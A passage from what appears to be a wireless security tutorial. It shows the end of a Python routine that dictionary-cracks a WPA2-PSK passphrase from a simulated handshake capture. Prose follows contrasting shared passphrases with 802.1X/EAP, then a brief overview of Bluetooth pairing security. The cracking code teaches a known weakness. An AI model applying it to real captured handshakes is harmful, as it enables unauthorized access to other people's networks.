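        kck = derive_kck(pmk_from_passphrase(candidate, cap["ssid"]),
                         cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(kck, cap["eapol_msg2"]), cap["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = build_capture("correct horse")         # assumed weak home passphrase
    print(crack_psk(cap, ["password", "12345678", "correct horse", "letmein1"]))
```

The 4096 PBKDF2 iterations are the only brake on the attacker, and they are applied per passphrase guess, not per client, so the strength of a home network is exactly the strength of its one shared passphrase. With 802.1X and EAP each user authenticates separately against the server, and there is no shared secret in the handshake to guess.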
Bluetooth Security
Bluetooth security can also be breached. From Bluetooth V2.1 onward, devices are protected by four security modes, ranging from no security at all to full data integrity and encryption control. Before V2.1, a new device joining a Bluetooth connection was given a channel protected by a predictable passcode such as 1234 entered on both devices, which was weak and easily broken. From V2.1 the master and slave devices are allotted a channel that is secured, integrity controlled and encrypted, and before communication starts the master and slave make sure that no other device has obtained the passkey.